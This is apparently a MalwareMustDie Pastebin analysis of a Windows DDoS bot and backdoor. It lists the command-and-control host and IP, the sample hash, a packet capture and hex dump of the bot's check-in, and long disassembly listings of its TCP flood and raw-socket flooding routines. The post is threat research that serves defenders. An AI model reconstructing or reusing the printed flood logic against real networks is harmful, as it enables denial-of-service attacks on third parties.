Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #MalwareMustDie! Chinese windows version DDOSer & Backdoor.
- CNC: 23.91.3.246 AS40676 | US | PSYCHZ.NET | PSYCHZ NETWORKS
- Sample: 0fc1a56432130509333542eec91527df6365743e754c468292f2a039f2606d9a
- VT: https://www.virustotal.com/en/file/0fc1a56432130509333542eec91527df6365743e754c468292f2a039f2606d9a/analysis/1409374344/
- Announce:
- https://twitter.com/MalwareMustDie/status/518672140896182272
- https://twitter.com/ochsenmeier/status/518680214566862848
- Verdicts:
- // ========================================
- // Backdoor to jiu40.mydns.iego.net (23.91.3.246)
- // Loc: 23.91.3.246|unassigned.psychz.net.|40676 | 23.91.0.0/19 | AS40676 | US | PSYCHZ.NET | PSYCHZ NETWORKS
- //
- // ========================================
- Pic Callback PoC: https://lh3.googleusercontent.com/-h5oOSXeoH_I/VDD3G-tXC9I/AAAAAAAARMw/b2zW6XcD7bM/h1900/00011.png
- 1 0.000000 x.x.x.x y.y.y.y DNS 80 Standard query 0x7084 A jiu40.mydns.iego.net
- 2 0.631257 y.y.y.y x.x.x.x DNS 96 Standard query response 0x7084 A 23.91.3.246
- 3 0.634134 x.x.x.x 23.91.3.246 TCP 62 2105→443 [SYN] Seq=0 Win=65535 Len=0 MSS=1460 SACK_PERM=1
- 4 0.634166 23.91.3.246 x.x.x.x TCP 62 443→2105 [SYN, ACK] Seq=0 Ack=1 Win=14600 Len=0 MSS=1460 SACK_PERM=1
- 5 0.634457 x.x.x.x 23.91.3.246 TCP 60 2105→443 [ACK] Seq=1 Ack=1 Win=65535 Len=0
- 6 0.638676 x.x.x.x 23.91.3.246 SSL 1514 Continuation Data
- Sent data:
- 00000000 01 00 00 00 27 24 20 20 51 52 53 57 51 56 20 20 ....*$ QRSWQV
- 00000010 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000020 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000030 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000040 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000050 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000060 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000070 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000080 20 20 20 20 20 20 20 20 77 89 8e 84 8f 97 93 40 w......@
- 00000090 78 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 xp // <=== OS version
- 000000A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 000000B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 000000C0 20 20 20 20 20 20 20 20 52 50 50 56 40 20 20 20 RPPV@
- 000000D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 000000E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 000000F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
- 00000100 20 20 20 20 20 20 20 20 52 50 51 54 4e 58 4e 52 RPQTNXNR
- 00000110 57 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 W
- 00000120 20 20 20 20 20 20 20 20 5d 2d 20 20 20 20 20 20 ]-
- // ========================================
- // DDoS PoC:
- // ========================================
- 0x04013C0 sub esp, 0A30h
- 0x04013C6 push esi
- 0x04013C7 mov esi, [esp+0A34h+arg_0]
- 0x04013CE push edi
- 0x04013CF lea eax, [esp+0A38h+WSAData]
- 0x04013D6 mov ecx, 24h
- 0x04013DB lea edi, [esp+0A38h+cp]
- 0x04013DF push eax // lpWSAData
- 0x04013E0 push 202h // wVersionRequested
- 0x04013E5 rep movsd
- 0x04013E7 call ds:WSAStartup
- 0x04013ED xor ecx, ecx
- 0x04013EF mov edx, dword ptr [esp+0A38h+hostshort]
- 0x04013F6 mov dword ptr [esp+0A38h+name.sa_family], ecx
- 0x04013FA mov dword ptr [esp+0A38h+name.sa_data+2], ecx
- 0x04013FE push edx // hostshort
- 0x04013FF mov dword ptr [esp+0A3Ch+name.sa_data+6], ecx
- 0x0401403 mov [esp+0A3Ch+name.sa_family], 2
- 0x040140A mov dword ptr [esp+0A3Ch+name.sa_data+0Ah], ecx
- 0x040140E call ds:htons
- 0x0401414 mov word ptr [esp+0A38h+name.sa_data], ax
- 0x0401419 lea eax, [esp+0A38h+cp]
- 0x040141D push eax // cp
- 0x040141E call sub_0x0401160
- 0x0401423 add esp, 4
- 0x0401426 mov dword ptr [esp+0A38h+name.sa_data+2], eax
- 0x040142A push 6 // protocol
- 0x040142C push 1 // type
- 0x040142E push 2 // af
- 0x0401430 call ds:socket
- 0x0401436 lea ecx, [esp+0A38h+name]
- 0x040143A mov esi, eax
- 0x040143C push 10h // namelen
- 0x040143E push ecx // name
- 0x040143F push esi // s
- 0x0401440 call ds:connect
- 0x0401446 cmp eax, 0FFFFFFFFh
- 0x0401449 jnz short loc_0x0401462
- 0x040144B push esi // s
- 0x040144C call ds:closesocket
- 0x0401452 pop edi
- 0x0401453 mov eax, 1
- 0x0401458 pop esi
- 0x0401459 add esp, 0A30h
- 0x040145F retn 4
- 0x0401462 //
- 0x0401462
- 0x0401462 loc_0x0401462: // xref: sub_0x04013C0+89
- 0x0401462 push ebx
- 0x0401463 push ebp
- 0x0401464 mov ebp, ds:send
- 0x040146A
- 0x040146A loc_0x040146A: // xref: sub_0x04013C0+10F
- 0x040146A push 400h
- 0x040146F call sub_0x04010E0
- 0x0401474 mov ebx, eax
- 0x0401476 push 1Ah
- 0x0401478 add ebx, 400h
- 0x040147E call sub_0x04010E0
- 0x0401483 add eax, 61h
- 0x0401486 mov ecx, ebx
- 0x0401488 mov bl, al
- 0x040148A mov edx, ecx
- 0x040148C mov bh, bl
- 0x040148E lea edi, [esp+0A48h+buf]
- 0x0401495 mov eax, ebx
- 0x0401497 add esp, 8
- 0x040149A shl eax, 10h
- 0x040149D mov ax, bx
- 0x04014A0 shr ecx, 2
- 0x04014A3 rep stosd
- 0x04014A5 mov ecx, edx
- 0x04014A7 and ecx, 3
- 0x04014AA rep stosb
- 0x04014AC cmp dword_0x04110A0, 1
- 0x04014B3 jz short loc_0x04014D1
- 0x04014B5 push 0 // flags
- 0x04014B7 lea eax, [esp+0A44h+buf]
- 0x04014BE push 800h // len
- 0x04014C3 push eax // buf
- 0x04014C4 push esi // s
- 0x04014C5 call ebp // send
- 0x04014C7 push 0Ah // dwMilliseconds
- 0x04014C9 call ds:Sleep
- 0x04014CF jmp short loc_0x040146A
- 0x04014D1 //
- 0x04014D1
- 0x04014D1 loc_0x04014D1: // xref: sub_0x04013C0+F3
- 0x04014D1 push esi // s
- 0x04014D2 call ds:closesocket
- 0x04014D8 mov ecx, dword_0x0413E14
- 0x04014DE push 0 // dwExitCode
- 0x04014E0 push ecx // hThread
- 0x04014E1 call ds:TerminateThread // forking stops..dunno what they call this in windozz.
- 0x04014E7 pop ebp
- 0x04014E8 pop ebx
- 0x04014E9 pop edi
- 0x04014EA mov dword_0x0413E14, 0
- 0x04014F4 xor eax, eax
- 0x04014F6 pop esi
- 0x04014F7 add esp, 0A30h
- 0x04014FD retn 4
- // ========================================
- // Scanner PoC, A lame .NET bruters..
- // ========================================
- 0x0401500 push ebp
- 0x0401501 mov ebp, esp
- 0x0401503 push 0FFFFFFFFh
- 0x0401505 push offset unknown_libname_31 // Microsoft VisualC 210/net runtime
- 0x040150A mov eax, large fs:0
- 0x0401510 push eax
- 0x0401511 mov large fs:0, esp
- 0x0401518 sub esp, 168h
- 0x040151E push ebx
- 0x040151F push esi
- 0x0401520 mov esi, [ebp+arg_0]
- 0x0401523 push edi
- 0x0401524 mov [ebp+var_10], esp
- 0x0401527 xor ebx, ebx
- 0x0401529 mov ecx, 24h
- 0x040152E lea edi, [ebp+var_174]
- 0x0401534 push 1 // dwFlags
- 0x0401536 push ebx // g
- 0x0401537 rep movsd
- 0x0401539 push ebx // lpProtocolInfo
- 0x040153A push 0FFh // protocol
- 0x040153F mov cl, 31h
- 0x0401541 mov al, 2Eh
- 0x0401543 mov dl, 38h
- 0x0401545 push 3 // type
- 0x0401547 push 2 // af
- 0x0401549 mov [ebp+cp], cl
- 0x040154C mov [ebp+var_1B], 39h
- 0x0401550 mov [ebp+var_1A], 32h
- 0x0401554 mov [ebp+var_19], al
- 0x0401557 mov [ebp+var_18], cl
- 0x040155A mov [ebp+var_17], 36h
- 0x040155E mov [ebp+var_16], dl
- 0x0401561 mov [ebp+var_15], al
- 0x0401564 mov [ebp+var_14], cl
- 0x0401567 mov [ebp+var_13], al
- 0x040156A mov [ebp+var_12], dl
- 0x040156D mov [ebp+var_11], bl
- 0x0401570 call ds:WSASocketA
- 0x0401576 cmp eax, 0FFFFFFFFh
- 0x0401579 mov [ebp+s], eax
- 0x040157C jz 0x0401687
- 0x0401582 mov eax, dword ptr [ebp+hostshort]
- 0x0401588 mov esi, ds:htons
- 0x040158E push eax // hostshort
- 0x040158F mov [ebp+to.sa_family], 2
- 0x0401595 call esi // htons
- 0x0401597 lea ecx, [ebp+var_174]
- 0x040159D mov word ptr [ebp+to.sa_data], ax
- 0x04015A1 push ecx // cp
- 0x04015A2 call sub_0x0401160
- 0x04015A7 add esp, 4
- 0x04015AA mov dword ptr [ebp+to.sa_data+2], eax
- 0x04015AD mov [ebp+var_30], 45h
- 0x04015B1 mov [ebp+var_2F], bl
- 0x04015B4 push 28h // hostshort
- 0x04015B6 call esi // htons
- 0x04015B8 push 100h
- 0x04015BD mov [ebp+var_2E], ax
- 0x04015C1 mov [ebp+var_2C], 1
- 0x04015C7 mov [ebp+var_2A], 40h
- 0x04015CD call sub_0x04010E0
- 0x04015D2 add esp, 4
- 0x04015D5 lea edx, [ebp+cp]
- 0x04015D8 mov [ebp+var_28], al
- 0x04015DB mov [ebp+var_27], 6
- 0x04015DF push edx // cp
- 0x04015E0 mov [ebp+var_26], bx
- 0x04015E4 call ds:inet_addr
- 0x04015EA mov edi, eax
- 0x04015EC lea eax, [ebp+var_174]
- 0x04015F2 push eax // cp
- 0x04015F3 call sub_0x0401160
- 0x04015F8 push 0EA60h
- 0x04015FD mov [ebp+var_20], eax
- 0x0401600 call sub_0x04010E0
- 0x0401605 add esp, 8
- 0x0401608 inc eax
- 0x0401609 push eax // hostshort
- 0x040160A call esi // htons
- 0x040160C mov ecx, dword ptr [ebp+hostshort]
- 0x0401612 mov [ebp+var_0x044], ax
- 0x0401616 push ecx // hostshort
- 0x0401617 call esi // htons
- 0x0401619 push 35A4E900h
- 0x040161E mov [ebp+var_0x042], ax
- 0x0401622 call sub_0x04010E0
- 0x0401627 add esp, 4
- 0x040162A inc eax
- 0x040162B push eax // hostlong
- 0x040162C call ds:htonl
- 0x0401632 push 200h // hostshort
- 0x0401637 mov [ebp+var_0x040], eax
- 0x040163A mov [ebp+var_3C], ebx
- 0x040163D mov [ebp+var_38], 50h
- 0x0401641 mov [ebp+var_37], 2
- 0x0401645 call esi // htons
- 0x0401647 mov edx, [ebp+var_20]
- 0x040164A push 14h // hostshort
- 0x040164C mov [ebp+var_36], ax
- 0x0401650 mov [ebp+var_34], bx
- 0x0401654 mov [ebp+var_32], bx
- 0x0401658 mov [ebp+var_50], edi
- 0x040165B mov [ebp+var_0x04C], edx
- 0x040165E mov byte ptr [ebp+var_0x048], bl
- 0x0401661 mov byte ptr [ebp+var_0x048+1], 6
- 0x0401665 call esi // htons
- 0x0401667 mov word ptr [ebp+var_0x048+2], ax
- 0x040166B
- 0x040166B 0x040166B: // xref: StartAddress+407
- 0x040166B cmp dword_0x04110A0, 1
- 0x0401672 jnz short 0x040169C
- 0x0401674 mov eax, dword_0x0413E10
- 0x0401679 push ebx // dwExitCode
- 0x040167A push eax // hThread
- 0x040167B call ds:TerminateThread
- 0x0401681 mov dword_0x0413E10, ebx
- 0x0401687
- 0x0401687 0x0401687: // xref: StartAddress+7C
- 0x0401687 mov ecx, [ebp+var_C]
- 0x040168A pop edi
- 0x040168B pop esi
- 0x040168C xor eax, eax
- 0x040168E mov large fs:0, ecx
- 0x0401695 pop ebx
- 0x0401696 mov esp, ebp
- 0x0401698 pop ebp
- 0x0401699 retn 4
- 0x040169C //
- 0x040169C
- 0x040169C 0x040169C: // xref: StartAddress+172
- 0x040169C mov [ebp+arg_0], ebx
- 0x040169F
- 0x040169F 0x040169F: // xref: StartAddress+3FA
- 0x040169F cmp [ebp+arg_0], 0Fh
- 0x04016A3 jge 0x04018FF
- 0x04016A9 push 0FAh
- 0x04016AE call sub_0x04010E0
- 0x04016B3 add esp, 4
- 0x04016B6 inc eax
- 0x04016B7 push eax
- 0x04016B8 push 0FAh
- 0x04016BD call sub_0x04010E0
- 0x04016C2 add esp, 4
- 0x04016C5 inc eax
- 0x04016C6 push eax
- 0x04016C7 push 0FAh
- 0x04016CC call sub_0x04010E0
- 0x04016D1 add esp, 4
- 0x04016D4 inc eax
- 0x04016D5 push eax
- 0x04016D6 push 0FAh
- 0x04016DB call sub_0x04010E0
- 0x04016E0 add esp, 4
- 0x04016E3 inc eax
- 0x04016E4 lea ecx, [ebp+cp]
- 0x04016E7 push eax
- 0x04016E8 push offset aD_D_D_D // "%d.%d.%d.%d"
- 0x04016ED push ecx // LPSTR
- 0x04016EE call wsprintfA
- 0x04016F4 push 100h
- 0x04016F9 mov [ebp+var_26], bx
- 0x04016FD call sub_0x04010E0
- 0x0401702 add esp, 1Ch
- 0x0401705 lea edx, [ebp+cp]
- 0x0401708 mov [ebp+var_28], al
- 0x040170B push edx // cp
- 0x040170C call ds:inet_addr
- 0x0401712 mov edi, eax
- 0x0401714 push 0EA60h
- 0x0401719 mov [ebp+var_24], edi
- 0x040171C mov [ebp+var_34], bx
- 0x0401720 call sub_0x04010E0
- 0x0401725 add esp, 4
- 0x0401728 inc eax
- 0x0401729 push eax // hostshort
- 0x040172A call esi // htons
- 0x040172C push 35A4E900h
- 0x0401731 mov [ebp+var_0x044], ax
- 0x0401735 call sub_0x04010E0
- 0x040173A add esp, 4
- 0x040173D inc eax
- 0x040173E push eax // hostlong
- 0x040173F call ds:htonl
- 0x0401745 mov [ebp+var_0x040], eax
- 0x0401748 lea eax, [ebp+var_64]
- 0x040174B push offset unk_0x040FE08
- 0x0401750 push eax
- 0x0401751 mov [ebp+var_50], edi
- 0x0401754 mov [ebp+var_0x04], ebx
- 0x0401757 mov [ebp+var_64], 32h
- 0x040175E call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x0401763 //
- 0x0401763
- 0x0401763 0x0401763: // xref: .rdata:stru_0x040FFC0
- 0x0401763 mov eax, offset 0x0401769
- 0x0401768 retn
- 0x0401769 //
- 0x0401769
- 0x0401769 0x0401769: // xref: StartAddress:0x0401763
- 0x0401769 lea ecx, [ebp+var_5C]
- 0x040176C push offset unk_0x040FE08
- 0x0401771 push ecx
- 0x0401772 mov [ebp+var_0x04], 2
- 0x0401779 mov [ebp+var_5C], 25Dh
- 0x0401780 call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x0401785 //
- 0x0401785
- 0x0401785 0x0401785: // xref: .rdata:stru_0x040FFD0
- 0x0401785 mov eax, offset 0x040178B
- 0x040178A retn
- 0x040178B //
- 0x040178B
- 0x040178B 0x040178B: // xref: StartAddress:0x0401785
- 0x040178B lea edx, [ebp+var_58]
- 0x040178E push offset unk_0x040FE08
- 0x0401793 push edx
- 0x0401794 mov [ebp+var_0x04], 4
- 0x040179B mov [ebp+var_58], 30Ch
- 0x04017A2 call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x04017A7 //
- 0x04017A7
- 0x04017A7 0x04017A7: // xref: .rdata:stru_0x040FFE0
- 0x04017A7 mov eax, offset 0x04017AD
- 0x04017AC retn
- 0x04017AD //
- 0x04017AD
- 0x04017AD 0x04017AD: // xref: StartAddress:0x04017A7
- 0x04017AD mov eax, [ebp+var_50]
- 0x04017B0 mov ecx, [ebp+var_0x04C]
- 0x04017B3 mov edx, [ebp+var_0x048]
- 0x04017B6 mov dword ptr [ebp+buf], eax
- 0x04017BC lea eax, [ebp+var_70]
- 0x04017BF push offset unk_0x040FE08
- 0x04017C4 push eax
- 0x04017C5 mov [ebp+var_E0], ecx
- 0x04017CB mov [ebp+var_DC], edx
- 0x04017D1 mov [ebp+var_0x04], 6
- 0x04017D8 mov [ebp+var_70], 4Eh
- 0x04017DF call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x04017E4 //
- 0x04017E4
- 0x04017E4 0x04017E4: // xref: .rdata:stru_0x040FFF0
- 0x04017E4 mov eax, offset 0x04017EA
- 0x04017E9 retn
- 0x04017EA //
- 0x04017EA
- 0x04017EA 0x04017EA: // xref: StartAddress:0x04017E4
- 0x04017EA mov ecx, 5
- 0x04017EF lea esi, [ebp+var_0x044]
- 0x04017F2 lea edi, [ebp+var_D8]
- 0x04017F8 push 20h
- 0x04017FA rep movsd
- 0x04017FC lea ecx, [ebp+buf]
- 0x0401802 push ecx
- 0x0401803 call sub_0x0401000
- 0x0401808 add esp, 8
- 0x040180B lea edx, [ebp+var_6C]
- 0x040180E mov [ebp+var_34], ax
- 0x0401812 mov [ebp+var_0x04], 8
- 0x0401819 push offset unk_0x040FE08
- 0x040181E push edx
- 0x040181F mov [ebp+var_6C], 293h
- 0x0401826 call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x040182B //
- 0x040182B
- 0x040182B 0x040182B: // xref: .rdata:stru_0x0410000
- 0x040182B mov eax, offset 0x0401831
- 0x0401830 retn
- 0x0401831 //
- 0x0401831
- 0x0401831 0x0401831: // xref: StartAddress:0x040182B
- 0x0401831 mov ecx, 5
- 0x0401836 lea esi, [ebp+var_30]
- 0x0401839 lea edi, [ebp+buf]
- 0x040183F lea eax, [ebp+var_60]
- 0x0401842 push offset unk_0x040FE08
- 0x0401847 push eax
- 0x0401848 rep movsd
- 0x040184A mov [ebp+var_0x04], 0Ah
- 0x0401851 mov [ebp+var_60], 0D2h
- 0x0401858 call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x040185D //
- 0x040185D
- 0x040185D 0x040185D: // xref: .rdata:stru_0x0410010
- 0x040185D mov eax, offset 0x0401863
- 0x0401862 retn
- 0x0401863 //
- 0x0401863
- 0x0401863 0x0401863: // xref: StartAddress:0x040185D
- 0x0401863 mov ecx, 5
- 0x0401868 lea esi, [ebp+var_0x044]
- 0x040186B lea edi, [ebp+var_D0]
- 0x0401871 push 28h
- 0x0401873 rep movsd
- 0x0401875 lea ecx, [ebp+buf]
- 0x040187B push ecx
- 0x040187C call sub_0x0401000
- 0x0401881 add esp, 8
- 0x0401884 lea edx, [ebp+var_68]
- 0x0401887 mov [ebp+var_26], ax
- 0x040188B mov [ebp+var_0x04], 0Ch
- 0x0401892 push offset unk_0x040FE08
- 0x0401897 push edx
- 0x0401898 mov [ebp+var_68], 1C2h
- 0x040189F call __CxxThrowException@8 // _CxxThrowException(x,x)
- 0x04018A4 //
- 0x04018A4
- 0x04018A4 0x04018A4: // xref: .rdata:stru_0x0410020
- 0x04018A4 mov eax, offset 0x04018AA
- 0x04018A9 retn
- 0x04018AA //
- 0x04018AA
- 0x04018AA 0x04018AA: // xref: StartAddress:0x04018A4
- 0x04018AA mov ecx, 5
- 0x04018AF lea esi, [ebp+var_30]
- 0x04018B2 lea edi, [ebp+buf]
- 0x04018B8 mov edx, [ebp+s]
- 0x04018BB rep movsd
- 0x04018BD mov ecx, 5
- 0x04018C2 lea esi, [ebp+var_0x044]
- 0x04018C5 lea edi, [ebp+var_D0]
- 0x04018CB lea eax, [ebp+to]
- 0x04018CE rep movsd
- 0x04018D0 push 10h // tolen
- 0x04018D2 xor ebx, ebx
- 0x04018D4 push eax // to
- 0x04018D5 push ebx // flags
- 0x04018D6 lea ecx, [ebp+buf]
- 0x04018DC push 28h // len
- 0x04018DE push ecx // buf
- 0x04018DF push edx // s
- 0x04018E0 mov [ebp+var_0x04], 0FFFFFFFFh
- 0x04018E7 call ds:sendto
- 0x04018ED mov eax, [ebp+arg_0]
- 0x04018F0 mov esi, ds:htons
- 0x04018F6 inc eax
- 0x04018F7 mov [ebp+arg_0], eax
- 0x04018FA jmp 0x040169F
- 0x04018FF
- 0x04018FF 0x04018FF: // xref: StartAddress+1A3
- 0x04018FF push 0Ah // dwMilliseconds
- 0x0401901 call ds:Sleep
- 0x0401907 jmp 0x040166B
- ----
- #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement